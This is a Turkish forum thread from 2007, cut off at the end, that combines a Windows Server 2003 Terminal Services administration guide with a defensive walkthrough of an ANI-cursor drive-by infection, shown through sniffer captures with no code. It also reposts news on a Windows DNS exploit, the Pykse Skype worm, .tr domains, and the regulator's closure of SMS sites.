Ayni zamanda sunuculara uzaktan erisim içinde kullanilir.Sistem yöneticisi sunucu üzerindeki yapilandirmalari uzak bilgisayardan takip ve koordine ederek hem is yükünün azaltilmasini hemde sürecin islemesindeki aksakliklari nerede olursa olsun kontrol altina alarak bertaraf etmenin avantajlarini kullanir.

2 Sekilde Kullanimi vardir;
a- Remoter Administration Mode :
b- Application Mode :

a) : Varsayilan olarak Server 2003 kurulu oldugunda Remote Admin modulu yüklü gelir ve kullanilabilmesi için lisans servisine basvurmasi gerekmez.Bu modda erisim saglamak için Administrator grubunda olmak gerek.Eger sunucu Domain içerisinde bulunuluyorsa dogal olarak Domain Admins grubuda katilacagindan bu yetkilere sahip kullanicilar uzaktan erisim saglayabilirler.Bununda siniri ayni anda en fazla 2 kullanicidir.Yönetim ve denetleme amaciyla kullanilacagindan cok fazla kullaniciya gerek yoktur.Belirtilen yetkili kullanicilar disinda kullanicilarinda baglanmasi isteniyorsa bunu, bilgisayarima sag tiklayarak özellikleri seçip, “Uzak” basligi altindan “uzak masa üstü kullanicilarini seç” i seçerek yapilandirabiliriz

b) : Application Mode : Konunun girisinde bahsettigimiz uygulama çalistirma ve sunucu üzerinde islem yapmak için kullanilan moddur.Uzaktan baglanabilme yetkisine sahip tüm kullanicilar sunucuya uzaktan login olabilir ve hepsi ayni anda birbirinden bagimsiz uygulama çalistirarak islemlerini gerçeklestirebilir.Serverin islemci ve ram gücü bu servisin etkin kullanilmasi açisindan önemli etkenlerdendir.Bu yüzden Terminal Serverlar güçlü yapilandirilmis ve eger mümkünse sadece bu servisin kullanimina tahsis edilmis makinalar olmasi etkin kullanimi açisindan yararlidir.Application Mode da kurulum için Server 2003 sistemininin en az Enterprise Edition olmasi gerekmektedir.Enterprise’in destekledigi 8 islemci ve 32gb Bellek özelligiyle bu servisin kullanilmasinda idealdir.

Application Mode Kurulumu : Program ekle/ Kaldir menüsünden Windows Bileseni ekle kaldiri seçerek “Terminal Server” i ve “Terminal Server Licencing” i seçerek ileriyi tiklayin. 2 adet seçenek geliyor önümüze..
Full Security ve Relaxed Security.

Full Security (Tam Güvenlik) : Bu modda Windows 2000 ve 2003 sistemleri izinleri kullanicilara uygulanir.Kullanicilar sistem dosyalarina,regedite,yapilandirma ayarlarina erisemezler ve güvenlik saglanmis olur.Güvenlik tanimlayicisi 2000 ve 2003 ailesinin standart ayarlarinin getirdigi güvenlik ayarlarini kullanir ve art niyetli / bilgisiz kullanicilarin hataya ve zarara sebebiyet vermelerine mani olur.

Relaxed Security (Gevsek Güvenlik) : Bu ayarin güvenlik tanimliyicilari Windows NT ve Terminal Server Editionin izinlerini kullanicilara uygular.Art niyetli kullanicilarin suistimaline açiktir.Kullanicilar sistem dosyalarina,kayit defterine,sistem yapilandirmalarina erisebilir ve üzerinde degisiklik yapabilirler.Ayni ada sahip bir baska dosyayi server üzerine ekleyerek sistemin ve kullanicilarin zarar görmesini saglayan bir art niyetli kisi bu erisimleri ancak “gevsek güvenlik” ayarlari seçilirse yapabilir.

Bu ayarlarimizi seçip ileri dedigimizde önümüze kullanilacak olan “Lisans Serveri” seçenegi gelir.Eger daha önceden bu servisi kullandiysak ve bir Lisans Servera sahipsek ilk kisimdaki alandan serverin ismini belirterek bu kismi geçebiliriz.Fakat servisi defa ilk kuruyorsak en alttaki seçenegi seçmeliyiz.”120 gün içerisinde lisans serverini belirleyecegim.”

Terminal Server ilk kurulumda Lisans Serverin belirlenip dagitilmasi için 120 gün zaman tanir.Bu süreç Servera yapilan ilk baglanti ile baslar ve 120 gün sonunda biter.Bu süreç içerisinde clientlardan yapilan lisanssiz baglantilar kabul edilir ve Lisans serverina baglanip dogrulugu arastirilmaz.120 günün sonunda yetsikiz kullanim süresi dolar ve istemcilerden gelen baglanti kabul edilmez.120 gün içerisinde lisans serveri kurulup clientlara dagitilip böyle bir baglanti kurulursa 120 gün beklenmeden Terminal Server Lisansli duruma geçer ve Lisans dagitimini yaparak onayli baglantilar(sifreli) saglanir.

Bir diger adimda Lisanslama yapilandirmasi yapilir.Burada önümüz 2 seçenek çikar.Bunlar ;
Per Device licencing mode (Aygit basina lisanslama)
Per User licencing mode (Kullanici basina lisanslama)

Aygit Basina Lisanslama : Her istemciye veya aygita Terminal Servera erisim hakki verilir.
Kullanici basina lisanslama : Kullaniciya sinirsiz sayida aygittan Terminal Servera baglanma hakki verilir.
Her aygita bir CAL ( Client Access Licencing-istemci erisim lisansi) gerekmez.Kullanici bazli yapilandirmak daha dogrudur.

Bir sonraki ve son adimda Lisans Server olarak tanimlanacak bilgisayarin belirlenmesi istenir.Eger serveriniz bir domaine dahil veya DC ise alttaki seçenegi seçerek kuruluma baslayabilirsiniz.

Kurulum bittikten sonra sistemi yeniden baslatmaniz istenecektir.

Administrative Tools altindan “Terminal Services Configuration” i açin.
Connection kismindan o anda mevcut baglanti ayarlarini ve kullanıcı haklarını yönetebilirsiniz.Kullanilan RDP Protokolu xp ve 2003 arasinda 128 bitlik bir veri sifrelemesini saglar ve güvenlidir.Server Setting kismindada performansa ve yapilandirmaniza dair ayarlari görebilirsiniz.Bunlar kisaca ;

Session Directory : Sisteme loginleri kontrol eder.Logoff olmus fakat sistemden çikmamis bir kullanici tekrar baglanmayi denerse (ortamda NLB varsa) ikinci server baglanti istegine karsilik vererek yeni bir oturum açacaktir.Fakat ilk serverdaki oturum devam ettiginden sistem kaynaklari gereksiz yere tüketilecektir.Bunun süre sinirlamasi kesinlikle yapilmalidir.
Restrict each user to one session : Her kullanicinin ayni anda sadece bir erisim hakkina sahip olmasidir.Bir üstteki anlatilanlar düsünülerek yapilandirilmalidir.
Delete temporary folders on exit : kullanicilarin geçici dosyalarinin oturum sonunda silinmesini saglar.

Connections kisminda,sagda bulunan baglantilar üzerindede degisiklik yapabilirsiniz.Bunun için Connections kisminda sağ tarafta sag tiklayarak özellikleri seçin ve ayarlarinizi yapin.Bir kaç özellik ;

- Kullanicilarin izinlerinin düzenlenmesi,
- Kullanicilarin erisimlerindeki kullanicaklari kaynaklari belirleme ( Driver mapping,Printing veya printer port yönlendirme)
- Kullanici baglantisinin süresiz yasaklanmasi
- Baglanti sifreleme sekli (High-128 bit,xp ve 2003 içindir.RDP 5.1 ve 5.2—-Client Compatible ise RDP 4 ve 5 clientlarin baglanmasini saglar.Sifreleme daha alt düzeydedir)

Yine Administrative Tools altinda bulunan “Terminal Services Manager” açin.

Bu alanda mevcut baglantilari görebilir ve yönetebilirsiniz.Kullanicilarin çalistirdiklari uygulamalar,bagli kaldiklari süre,bos bekleyen süre,uyari mesaji gönderme,clienta baglanma gibi özellikleri vardir.Bunlarin yaninda eger agda birden fazla Terminal Server varsa en sik kullanilanlari,tüm serverlari ve durumlarini izleyebilirsiniz.

Sistem yöneticilerinin islerini kolaylastirmada büyük öneme sahip Terminal Serverlara,admin yetkisine sahip bir kullanici uzaktan eriserek birden fazla Terminal Serveri veya farkli yapilandirilmis (SQL,IIS) Serverlari tek bir ekrandan rahatlikla yönetebilir.Zaman,maliyet ve is yükünün azaltilmasi açisindan büyük öneme sahiptir.

MMC üzerinden Yönetim :

Mevcut degilse snap-in ekleyerek sürekli kullanim için isinizi kolaylastirabilirsiniz.
Computer Configuration /Administrative Templates /Windows Components /Terminal Services

Bu kisimda Serverin performansli çalismasi için yapilmasi gereken bazi ayarlamalara göz atabiliriz.Bunlar öncelikle “Session” klasorundeki ayarlardir.Aktif,bosta olan baglantilari düzenler.Baglantilara zaman siniri belirlenebilir.Sifreleme klasorunde client/server baglantisi sifreleme düzeyi ayarlanabilir.Ana dizindeki ayarlamalarda beklentiniz ölçüsünde optimize edilebilir.

Default Portu Degistirme : Default olarak Terminal Server 3389 dur.Bunu degistirerek baglanti saglanmasi güvenligi arttirmada arti bir yarardir.
Kayit defterinden ;
HKLM/System/CurrentControlSet/Control/Termial Server/Wds/Rdpwd/Tds/TCP/PortNumber kismindan degistirebilirsiniz.Degistirdikten sonra her baglanti kuracaginizda baglanti penceresinde Computer kisminin yanina baglanti portunuda yazmalisiniz.Mesela Serverin adi TServer1
“TServer1:3333″ <-- degistirilen port

Komut satırından Yönetim :

query user: Serverda oturum açan kullanıcı hakkında bilgi verir
query termserver:Networkte bulunan Terminal Serverların listesini verir
reset session: Oturumun kapatılmasını sağlar
msg:Kullanıcıya mesaj gönderir
mstsc:RDP yi başlatır
shadow: Kullanıcının oturumunu uzaktan kontrol etmeyi sağlar
tscon: başka bir oturuma bağlanılmasını sağlar
tsdisconMsn Surprisedturumun bağlantısını keser
tskill:çalışan bir processi sonlandırır
tsshutdnMsn Confusedistem yöneticisi bu komutla Terminal Serverı uzaktan kapatıp açabilir.

Istemci tarafindan Baglanilmasi : Istemci tarafindaki kullanici uzak masa üstü programini (baslat/tüm programlar/accessories/communications) çalistirarak servera baglanabilir.veya çalıştır kısmına “mstsc” yazarak bu uygulamaya erişebilirler.Bu baglantinin gerçeklesmesi için kullaniciya atanmis Remote baglanabilirlik yetkisi olmalidir.Açilan pencereye kullanici adi/sifre varsa domain yazilarak baglanti gerçeklestirilir.Burada bazi ayarlamalar yapilabilir(Admin izin verdiyse).

Bunlar ;

Display : Ekran çözünürlügü ve renk derinligi
Local Resources : Terminal serverdan ses aktariminin saglanip saglanmamasi,kendi harddisikinize,yaziciniza Terminal Server üzerinde görünüp erismeniz
Programs : Baglanildigi anda çalistirilmasi istenen program

Bir kaç Püf Noktasi :

* Kurulumda Güvenlik endiseleriniz varsa Full Security seçenegini Seçin.
* MMC üzerinden Idle ve max logon sürelerini belirleyiniz
* Session Directoryi aktif yapiniz
* Terminal Serveri NTFS formatli diske kurunuz
* TS kapatilacagi zaman “kapat” yerine Tsshutdn komutunu kullanın
* Lisans Serverın 120 günlük süresini takip edin
* Kullanıcı izinlerini gözden geçirin
* Ses,Printer,Driver mapping özelliklerini kullanılmayacaksa kısıtlayın.


Hex / bmw3.pig/


att6Btmp


Yukarıda bmw3.pig isimli dosyanın içeriği gözükmektedir. Bu “Animated Cursor” tipi dosyalarına özgü olan bir açıktan faydalanarak sisteme zararlı program yüklemeye çalışan bir dosyadır.

Web sayfalarını gezerken ansızın açılan pencereler, sistem kilitlenmeleri kötü bir haberin başlangıcı olabilir. Yeni bir güvenlik zaafı ortaya çıktığında bu istismarın tehlike boyutunu arttıracak çeşitli yöntemlerde ortaya çıkmaktadır. Bilinen yöntemleri takip etmek kolay olabilir.
Fakat Antivirus, Firewall gibi yazılımları atlatacak yöntemlerin ortaya çıkması internet kullanıcılarını zor durumda bırakması içten bile değildir.

Adım adım bir zararlı uygulamanın sisteme erişmesini inceleyelim:


att78tmp

* WEB Sayfaları arasındaki gezintiler esnasında istemediğiniz bir bağlantının meydana getirdikleri sisteminizi sizin kontrolü haricinde başka kesimlere de kontrol etme imkanı sağlayabilir. Yukarıdaki resimde görüldüğü gibi bağlantı sağlanan sayfa isteğiniz dışında bazı işlemleri gerçekleştirmeye zemin hazırlar. Burada yer alan resimler sniffer(paket koklayıcı) programı ile elde edilmiştir.


att70tmp

* Arka planda calışan sayfa işletim sistemi kontrolünü gerçekleştirmektedir. Kontrol işlemi sonucu istenilen işletim sistemini kullanıyorsanız tehlikeli bir kapının yanına yaklaştınız demektir.


att76tmp

* Resimde görüldüğü gibi işletim sisteminiz güvenlik zaafı sonucunda uzaktan sisteminize istenilen uygulama aktarılıyor.


att71tmp

* Zararlı program sisteme yüklenmeye başlamıştır. Sniffer ile tespit edilen paket kontrol edildiğinde bunun bir .exe uygulaması olduğu görülür(Başlık: MZP).

Sisteme aktarılan bu uygulama derinlemesine incelendiğinde;

Registry ayarlarında kullanıcının bilgisi dahilinde olmayan değişiklikler yapmaktadır.


att74tmp

* Bir çok zararlı programların temel huyu registry kayıtlarında kendine göre oynama yapmaktır. Böylece sistemin açılışında otomatik aktif olur ve internet Explorer gibi browserlarda kontrolü ele alır.


att72tmp

* Kendini gizlemek çeşitli yöntemler kullanır. Bunun için güvenilir bir imaj sağlamış olan herhangi bir dizine kendisini kopyalar (Örn: C:\Program Files\Microsoft Shared\MSINFO”).


att75tmp

* Zararlı uygulama kendini dizine kopyalamıştır. Fakat görünürde işletim sistemine ait uygulamalardan başka bir uygulama görünmemektedir.


att6Ctmp

* Bilindik bir komut olan “dir” komutuyla dizini incelediğimizde yine işletim sistemine ait dosyalar görünüyor.


att6Dtmp

* dir /ah komutuyla gizli dosyaları rahatlıkla görüyoruz. “NewInfo.dll” ve “system.2dt” isimli dosyalar sistemi takip etmek için kullanıcıdan habersiz bir güvenlik zaafından yararlanılarak sisteme yüklenmiştir.

Internet kullanıcılarının kişisel bilgilerini ele geçirmek için kullanıcılar tarafından sıklıkla ziyaret edilen Web sayfaları birer hedef haline dönüşmektedir. Bu kişi/kişiler Web sayfalarında görünür bir değişiklik yapmaktansa gizli kodlar ekleyerek kullanıcıların kişisel bilgilerini ele geçirme yolunu tercih ederler.
Son düzenleyen vain; 16 Nisan 2007 09:49 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
17 Nisan 2007       Mesaj #225
vain - avatarı
Ziyaretçi
Windows DNS güvenlik açığı için exploit kodları yayınlandı

Henüz yaması çıkmamış olan Microsoft DNS güvenlik açığı için yayınlanan exploit kodu yaygın olarak kullanılabilir. Symantec'in duyurusuna göre hafta sonu Windows DNS açığı için 4 exploit yayınlandı.

Güvenlik açığı Windows 2000 ve Windows 2003 sunucu sistemlerini etkiliyor. Microsoft geçtiğimiz hafta bu açıktan yararlanan bir saldırıdan haberdar olduklarını belirtmişti fakat henüz bir exploit kodu yayınlanmamıştı.

Microsoft problemi gidermek için halen çalışıyor. Kullanıcıların yama çıkana kadar geçici çözüm önerilerini uygulaması öneriliyor.

McAfee pazartesi günü öğleden sonra DNS güvenlik açığından yararlanan bir Nirbot varyantı tespit ettiklerini duyurdu. Nirbot saldırgana etkilenen bilgisayarın tüm kontrolünü IRC kanalı vasıtası ile veriyor.

DNS açığı Windows XP veya Windows Vista sistemleri etkilemiyor.
Windows 2000 SP4, Windows Server 2003 SP1 ve SP2 açıktan etkileniyor.

Yeni Hızlı Mesajlaşma Virüsü Skype Kullanıcılarını Hedefliyor

F-Secure pazartesi günü yeni bir instant-messaging virüsünün Skype'ın chat özelliğini kullanarak yayıldığını duyurdu. Pykse.A olarak adlandırılan kurtçuk (worm) hızlı mesajlaşma uygulamarını etkileyen diğer tehditlere benziyor. Hedef Skype kullanıcısı bir yazı ve JPEG dosyasına gidiyor görünen bağlantı adresi içeren bir chat mesajı alıyor.

Bağlantı adresine tıklandığında kullanıcı kötü amaçlı dosyaya yönlendiriliyor. Bu dosya çalıştırıldığında kullanıcının Skype listesindeki bütün kullanıcılara gönderiliyor. Ek olarak kullanıcının Skype durum mesajını "Do Not Disturb" olarak değiştiriyor.

Pykse çeşitli web sitelerini de otomatik olarak ziyaret ediyor fakat bu sitelerde kötü amaçlı dosyalar yok. Virüs bulaşan makineleri saymak için kullanılıyor gibi görünüyor.

Pykse Windows sistemlerde Skype çalıştıran kullanıcıları etkiliyor.
Son düzenleyen vain; 17 Nisan 2007 11:06 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
18 Nisan 2007       Mesaj #226
vain - avatarı
Ziyaretçi
Telekomünikasyon Piyasa Gözetim Laboratuvarı Açıldı
Açılış törenine, Ulaştırma Bakanlığı Müsteşarı İbrahim Şahin, Denizcilik Müsteşarı İsmet Yılmaz, Avrupa Komisyonu Türkiye Delegasyonu birinci Sekreteri ve B Bölümü Başkanı Ulrike Hauer, TBMM Tarım Orman Komisyonu Başkanı Vahit Kirişçi, Telekomünikasyon Kurul Başkanı Dr. Tayfun Acarer, Kurul II. Başkanı Galip Zerey, Kurul Üyeleri Dr. Faruk Cömert, Hüseyin Edis, Dr. T. Ayhan Beydoğan ve A. Hamdi Atalay, Telekomünikasyon iletişim Başkanı Fethi Şimşek, Hacettepe Üniversitesi Rektör Yardımcısı Hasan Bayhan ve Mühendislik Fakültesi Dekanı Selçuk Geçim, Türk Telekom Genel Müdürü Paul Doany, Genel Müdür Yardımcıları Celalettin Dinçer ve Mehmet Toros, Turkcell, Vodafone ve Avea üst düzey yöneticileri, TESİD Başkanı Suat Baysan, MOBİSAD Başkanı Murat Dursun, TUYAD üyeleri, sektör temsilcileri ve basın mensupları katıldılar.

Telekomünikasyon Kurulu Başkanı Dr. Tayfun Acarer, açılış konuşmasında Telekomünikasyon Terminal Ekipmanları Piyasa Gözetim Laboratuvarının kurulması ile, kamu, sektör ve tüketici açısından bir çok faydalar beklendiğini söyledi. Acarer; Türkiye-AB Mali İşbirliği Programı kapsamında gerçekleştirilen Laboratuvarın, test sonuçlarının uluslararası tanınırlığı ve güvenirliğini sağlamak amacıyla akreditasyon işlemlerine yönelik çalışmaların devam ettiğini söyledi.

Avrupa Komisyonu Türkiye Delegasyonu 1. Sekreteri ve B bölümü başkanı Ulrike Hauer konuşmasında; bu laboratuvarın, malların serbest dolaşımı alanındaki teknik AB mevzuatının uygulanabilmesi için, AB'nin Türkiye'de teknik altyapıya yaptığı başlıca yatırımlardan birisi olduğunu belirtti. Hauer, bu laboratuvar bölgede elektromanyetik uyumluluğun ölçümünü sağlayan en büyük deney odasına sahiptir dedi.


TR UZANTILI ADRES SAYISI ARTTI

Türkiye interneti büyümesini sürdürüyor. ODTÜ Alan Adı Yönetimi (Domain Names Systems-DNS), son dönemde jenerik alan adlarına
getirdiği

yeniliklerle internette ülke uzantısını belirleyen ''tr'' uzantılı adres sayısı 120 bini aştı.ODTÜ Alan Adı yönetiminden alınan bilgiye göre, uluslararası düzeyde organize olan İnternet Tahsisli Sayılar ve İsimler Kurumunun (ICANN) internet alan adlarında yaptığı açılımlar, Türkiye'de de kullanıcılara yansıtılıyor. ODTÜ Alan Adı
Yönetimi, Türkiye'de internet kullanımını yaygınlaştırmak amacıyla "tr" uzantılı adreslerin tescilinde hem bazı kolaylıklar sağladı hem de mesleklere yönelik yeni uzantılar açtı.

Bu kapsamda, bilinen ''com.tr'', ''gov.tr'', ''gen.tr'', ''k12.tr'', ''edu.tr'', ''bel.tr'', ''pol.tr'' ve ''mil.tr'' uzantılarına ''web.tr'', ''name.tr'', ''biz.tr'' ile avukatlar için ''av.tr'', doktorlar için ''dr.tr'', telefon numaralarının internet adresi olarak kullanılmasına imkan veren ''tel.tr'' ve televizyon yayıncılığı sektöründe hizmet veren gerçek ve tüzel kişiler için ''tv.tr'' uzantıları kullanıma açıldı.

''tel.tr'', ''dr.tr'' gibi bazı alan uzantıları kullanıcılardan ilgi görmezken, son dönemde medya dünyası için ''tv.tr'' uzantısının tesciline başlandı. ''tv.tr'' uzantısıyla yaklaşık 50 adres tescil edildi. ODTÜ Alan Adı Yönetiminin adres tescili konusunda getirdiği kolaylıklar ise ''tr'' uzantılı adreslerin sayısında neredeyse patlama sağladı. ''tr'' uzantılı
internet adreslerinin sayısı 120 bini aştı ve özellikle ''com.tr'' uzantılı
Son düzenleyen vain; 18 Nisan 2007 16:09 Sebep: Mesajlar Otomatik Olarak Birleştirildi
vain - avatarı
vain
Ziyaretçi
19 Nisan 2007       Mesaj #227
vain - avatarı
Ziyaretçi
Robocop gerçek oluyor 92407040415491662tk9th




Güney Kore'de gösterilere müdahale eden polis güçlerinin dahili kamerası bulunan başlık kullanmaya başlayacağı bildirildi. Bizdeki Çevik Kuvvet'in muadili olan güçlerin yeni donanımı ile ilgili haberler hakkında polis yetkilileri tarafında bir açıklama yapılmadı.

Yonhap haber ajansının haberinde kameraların göstericiler hakkında daha fazla kanıt toplamayı sağlamak üzere kullanılacağı belirtildi.
vain - avatarı
vain
Ziyaretçi
19 Nisan 2007       Mesaj #228
vain - avatarı
Ziyaretçi
SMS Siteleri 'Lisans'a Takıldığı için Kapatılıyor

Geçtiğimiz hafta toplu SMS satan firmalara hosting hizmeti veren firmalara giden yazılarla, Telekomünikasyon Kurumu'nun bu sitelere erişimin kesilmesini istediğini SMS Sitelerinin kapatılması Neye İşaret Ediyor başlıklı yazımızla duyurmuştuk.

Bu konuyla ilgili sorularımızı Telekomünikasyon Kurumu'na iletmiştik. Kurumdan gelen açıklama ve ilettiğimiz sorulara gelen cevaplar şu şekilde:

  • Telekomünikasyon Kurumunca, internet üzerinden toplu SMS satışı yapan gerçek ve tüzel kişilerin verdiği hizmetin durdurulmasına yönelik yapılan çalışmalar aşağıda belirtilen mevzuat hükümleri göz önünde tutularak uygulanmıştır.
    1. 406 sayılı Kanunun 1’inci maddesinde “Telekomünikasyon”; “Her türlü işaret, sembol, ses ve görüntünün ve elektrik sinyallerine dönüştürülebilen her türlü verinin kablo, telsiz, optik, elektrik, manyetik, elektro manyetik, elektro kimyasal, elektro mekanik ve diğer iletim sistemleri vasıtasıyla iletilmesi, gönderilmesi ve alınması” şeklinde tanımlanmış ve yine aynı maddede “telekomünikasyon hizmeti” ise; “Telekomünikasyon tanımına giren faaliyetlerin bir kısmının veya tümünün hizmet olarak sunulması” şeklinde tanımlanmıştır.

      Bahse konu olayda, internet vasıtasıyla toplu SMS hizmeti verilmesi söz konusu olup, bu şekilde SMS hizmetinin, yukarıda yer alan tanımlar doğrultusunda bir telekomünikasyon hizmeti olduğu aşikardır.
    2. 406 sayılı Kanunun 2’nci maddesinin (a) bendinde; “Hiç kimse Kurumla bir görev, imtiyaz sözleşmesi yapılmış veya Kurum tarafından bir telekomünikasyon ruhsatı veya genel izin verilmiş olmadıkça, telekomünikasyon hizmeti yürütemez ve/veya altyapısı kuramaz ve işletemez” hükmü bulunmaktadır. 1 nci maddede açıklandığı üzere toplu SMS satışı bir telekomünikasyon hizmeti olması nedeniyle GSM işletmecilerinin dışında anılan hizmeti verilmesi ancak yetkilendirmeyle mümkündür.
    3. 406 sayılı Kanunun 2’nci maddesinin (f) bendinde; “Kurum; Türk Telekom dahil işletmecilerle imzaladığı sözleşmelerin ve verdiği genel izin ve telekominikasyon ruhsatlarının şartlarına uyulmasının sağlanması için gereken tedbirleri almaya, faaliyetlerin mevzuat ile görev ve imtiyaz sözleşmesi, telekomünikasyon ruhsatı veya genel izin şartlarına uygun yürütülmesini izleme ve denetlemeye, aykırılık halinde ilgili işletmecinin bir önceki takvim yılındaki cirosunun %3'üne kadar idari para cezası uygulamaya, milli güvenlik, kamu düzeni veya kamu hizmetinin gereği gibi yürütülmesi amaçlarıyla gerekli tedbirleri almaya, gerektiğinde tesisleri tazminat karşılığında devralmaya ya da ağır kusur halinde imtiyaz sözleşmesini, telekomünikasyon ruhsatını ya da genel izni iptal etmeye yetkilidir.” hükmü yer almaktadır.
    4. 406 sayılı Kanunun 18’inci maddesinin 2’nci fıkrasında ise; “2’nci maddenin (a) fıkrasına aykırı olarak genel izin ve ruhsat almaksızın telekomünikasyon hizmeti verenlerin tesisleri Kurum’un talebi üzerine ilgili mülki amirlerce kapatılarak hizmetlerine son verilir. Tekerrürü halinde failleri hakkında ikiyüz milyon liradan üç milyar liraya kadar para cezasına hükmolunur” hükmü yer almaktadır. Söz konusu hüküm uyarınca, Kurumumuzdan gerekli yetkilendirmeyi (genel izin) almaksızın faaliyet yürüten söz konusu şirketlerin faaliyetlerinin Kurumun talebi üzerine ilgili mülki amirlerce kapatılarak, hizmetlerine son verilmesi gerekmektedir. Kurum 406 sayılı Kanunun 2/f maddesi uyarınca kamu düzeni veya kamu hizmetinin gereği gibi yürütülmesi amaçlarıyla gerekli tedbirleri alma yetkisi mevcuttur.
    5. Telekomünikasyon Kurumu’nun Teşkilat ve Görevleri ile Çalışma Usul ve Esasları Hakkında Yönetmelik’in 9’uncu maddesinin (a) bendi uyarınca; “Kanunda yasaklanan faaliyetler ve hukuki işlemler ve lisans ihlalleri hakkında başvuru üzerine veya re’sen inceleme, araştırma ve soruşturma yapmak; ihlal tespiti durumunda ihlallere son verilmesi için gerekli tedbirleri almak ve gerekli cezaları uygulamak” yetki ve görevi Telekomünikasyon Kurulu’na bırakılmıştır. Söz konusu sitelerden kaynaklanan mevzuata aykırı faaliyetler nedeniyle kamu düzenin bozulmasının engellenmesini teminen bu sitelere erişimin önlenmesi ve ilgili şirketler hakkında yapılacak işlemlere ilişkin hızla karar alınması ve uygulanması gerekmektedir.

    Yukarıda yer alan mevzuat hükümleri çerçevesinde sorulariniza ilişkin değerlendirmeler aşağıda yapılmıştır.

turk.internet.com : SMS sitelerinin kapatılması konusunda TK tarafından SMS sitelerine değil, hosting sağlayan firmalara bildirim yapılmış. Usul olarak asıl bildirim yapması gereken yer site sahibi firmalar degil midir?

Telekomünikasyon Kurumu :
Soruda geçen ve izinsiz olarak toplu SMS satışı yapan firmalar Kurum tarafından SMS hizmeti konusunda yetkilendirilmemiş olduklarından, bunlara mevzuat gereği Kurumun herhangi bir bildirim yapma zorunluluğu bulunmamaktadır.

turk.internet.com : Telekomünikasyon Kurumu'nun şu anda "site kapatma" yetkisi var mı?

Telekomünikasyon Kurumu :
TK yürüttüğü işlemde bir site kapatmamış olup 406 sayılı Telgraf ve Telefon Kanunun 2(f) ve 18 nci maddesi hükümlerinin uygulanmasına yönelik olarak, yetkisiz SMS hizmeti sunan kuruluşların internet sitelerine erişimin engelenmesi amacıyla ISS işletmecilerine bildirim yapmıştır.

turk.internet.com : Bu kararın alınma nedeni nasıl bir şikayettir? Operatörlerin bu gelir kalemini kendilerine çekmek istemeleri seklinde bir duyumumuz var. Bu duyum doğru mudur?

Telekomünikasyon Kurumu :
Bu karar gelen şikayetler ve bu şikayetler üzerine TK’nın konuyla ilgili tespitleri üzerine alınmıştır.

Hali hazırda SMS hizmeti GSM şebekeleri üzerinden verildiği için anılan hizmetin GSM işletmecileri tarafından sunulması gerektiği aşikardır ancak Kurum bu hizmeti yetkilendirmesi halinde GSM işletmecileri dışında olan ve Kurumdan bu konuda lisans almış işletmeciler de söz konusu hizmeti sunma imkanına kavuşacaklardır.

turk.internet.com : Kararın gerekçesini tam olarak alabilir miyiz?

Telekomünikasyon Kurumu :
Yetkisiz olarak toplu SMS hizmeti veren gerçek ve tüzel kişilerin verdikleri hizmetin durdurulmasına ilişkin kararın hukuki dayanakları; 406 sayılı Kanunun 1’inci maddesi, 2’nci maddesinin (a) ve (f) bendi, 406 sayılı Kanunun 18’inci maddesinin 2’nci fıkrası, Telekomünikasyon Hizmet ve Altyapılarına İlişkin Yetkilendirme Yönetmeliğinin 6’ncı maddesi ve Telekomünikasyon Hizmet ve Altyapılarına İlişkin Yetkilendirme Yönetmeliği’nin “Ek-A Hizmete Özel Ekler” arasında yer alan “Ek-A6 Kablolu ve Kablosuz İnternet Servis Sağlayıcılığı Hizmeti”ne ilişkin düzenleme ekinin 5.2 maddesi ve Telekomünikasyon Kurumu’nun Teşkilat ve Görevleri ile Çalışma Usul ve Esasları Hakkında Yönetmeliğin 9’uncu maddesidir.

turk.internet.com : 4-5 yıldır Toplu SMS servisleri veren firmalar var ama TK bu konuda bir lisanslamayı bugüne dek yapmadı. Bunun bir nedeni var mı?

Telekomünikasyon Kurumu :
Ülkemizde hizmet vermekte olan mobil telekomünikasyon (GSM) işletmecilerinin mevcut şebekeleri üzerinden SMS hizmeti vermek isteyecek olan işletmecilerin yetkilendirilebilmeleri amacıyla anılan hizmetin lisans bedeli 30/10/2001 tarih ve 2001/3359 sayılı Bakanlar Kurulu Kararı ile belirlenmiş olmasına rağmen; Hazine Müsteşarlığı, GSM ve benzeri mobil şebekeler üzerinden mesaj hizmetleri sunmak üzere Kurum tarafından yetkilendirilmesi planlanan işletmecilerden %15 hazine payı alınabilmesi için bu işletmecilerden hazine payı alınmasını sağlayacak bir düzenlemenin yapılması gerektiğini vurgulamıştır.

Bu kapsamda, Haziran 2006 yılı içerisinde mobil şebekeler ve bu şebekeler üzerinden verilecek telekomünikasyon hizmetlerini sunacak işletmecilerin hazine payı ödemelerine ilişkin usul ve esasları düzenlemek amacıyla Hazine Müsteşarlığı yetkilileri Kurum görüşlerini de değerlendirmek suretiyle Kanun tasarısı çalışmaları yapmış ve üzerinde mutabık kalınan söz konusu kanun tasarısı taslağı TBMM Plan ve Bütçe Komisyonu’nda görüşülerek Genel Kurul’un onayına sunulmuştur.

Söz konusu Kanun tasarısının TBMM Genel Kurulu’nda kabul edilmesi ve yasalaşması halinde mobil şebekeler üzerinden hizmet sunmak isteyecek işletmecilerin yetkilendirilmesi mümkün olabilecek ve yukarıda açıklanan hususlardaki sıkıntılar ortadan kaldırılabilecektir.

turk.internet.com : Lisanslama koşulları belirlenmemiş ve süreci yapılmamış bir konuda halen yürümekte olan işlemlerin aniden durdurulması büyük zararlara yol açabilir deniliyor. TK bu konuda nasıl davranacak? Bu firmaların açabilecekleri tazminat davaları olursa muhatap kim olacak?

Telekomünikasyon Kurumu :
Mevzuata aykırı olarak yetki belgesine sahip olmadan telekomünikasyon hizmeti verenlerin hizmetlerinin durdurulması Kurumumuzun başlıca görevleri arasındadır.

Kurumca yetkilendirilmeden hizmet sunan bu kuruluşlar, hazine payı, hazineye ödenecek asgari lisans bedeli, özel iletişim vergisi, kurum masraflarına katkı payı vb ödenmesi zaruri ödemeleri yapmayarak hazineyi zarara uğratmaktadırlar.

turk.internet.com : Aynı hizmeti yurtdışından veren siteler var. Bu sitelere karşı da yaptırım uygulayacak mısınız?

Telekomünikasyon Kurumu :
Ülkemizde izinsiz telekomünikasyon hizmeti verdiği tespit edilen şirketlere yönelik olarak aynı uygulamaya devam edilecektir.

turk.internet.com : Hizmet durdurma yerine site erişime kapatma yapılmasının farkı nedir?

Telekomünikasyon Kurumu :
